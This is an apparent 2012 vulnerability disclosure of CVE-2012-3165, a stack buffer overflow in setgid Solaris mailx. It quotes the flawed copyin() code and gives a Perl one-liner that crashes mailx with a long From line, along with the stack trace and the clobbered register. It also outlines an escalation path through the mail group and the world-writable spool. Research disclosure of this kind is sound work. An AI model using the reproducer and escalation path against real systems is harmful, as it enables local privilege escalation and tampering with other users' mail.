2012/10/18
tags: solaris mailx vulnerability CVE-2012-3165
mailx(1)
on Solaris 10 and 11 is world-executable, setgid and
vulnerable to a buffer overflow bug. Via the mail
group a local
attacker potentially wins access to the local mail spool (/var/mail
)
and sendmail(8)
configuration. They may then repeat the attack on any
user susceptible to using mailx
to read from the spool.
The problem occurs in the copyin()
function of head.c
(cribbed from
an old copy of OpenSolaris source):
/* * Copy the string on the left into the string on the right * and bump the right (reference) string pointer by the length. * Thus, dynamically allocate space in the right string, copying * the left string into it. */ static char * copyin(char src[], char **space) { register char *cp, *top; register int s; s = strlen(src); cp = *space; top = cp; strcpy(cp, src); cp += s + 1; *space = cp; return(top); }
The phrase "dynamically allocate" in the comment is incorrect. No new memory is allocated and therefore the target can be overrun. We can hit this by providing a very long "From" line in a message:
From AAAAAAAAAAAAA...
like this:
mallory@sunos:~$ perl -e 'print "From ".("a"x2048)."\n";' > /tmp/mbox mallory@sunos:~$ mailx -f /tmp/mbox Bus Error (core dumped) mallory@sunos:~$
On SPARC this generates SIGBUS
with stack:
ffbfcee8 setptr+0x49c(41414141, 43530, 0, 1, 0, 1)
ffbff778 setfile+0x510(40c00, 1, 1, 436e8, 44f8c, 43400)
ffbff8e0 main+0xa04(44800, 6d, 46910, 46910, 3f400, 1)
ffbff9c0 _start+0x108(0, 0, 0, 0, 0, 0)
here:
setptr+0x498: f0 03 a0 64 ld [%sp + 0x64], %i0
setptr+0x49c: ec 06 20 00 ld [%i0], %l6
At this point (setptr+0x49c
), register %i0
contains:
%i0 = 0x41414141
whereas it should contain the progname
string variable's address
("mailx"). That is, the stack has been clobbered by "AAA...".
The local mail spool typically looks like this:
drwxrwxrwt 3 root mail 512 Oct 17 02:03 /var/mail
-rw-rw---- 1 root mail 709 Sep 26 05:54 /var/mail/root
If the mail file does not already exist then the attacker can immediately
create a malicious file (since the spool is world-writable). Otherwise
they can first attack the mail
group and then use those privileges
to obliterate and replace any existing mail file in order to target
individual users or roles, including root.
I checked back through the UNIX archives via Unix Tree to see just how old this bug was. I can trace it right back to BSD 2.79 (and it may be even older). 2.79 was released for the PDP-11 in 1979 making this the oldest bug I've ever found by quite a way.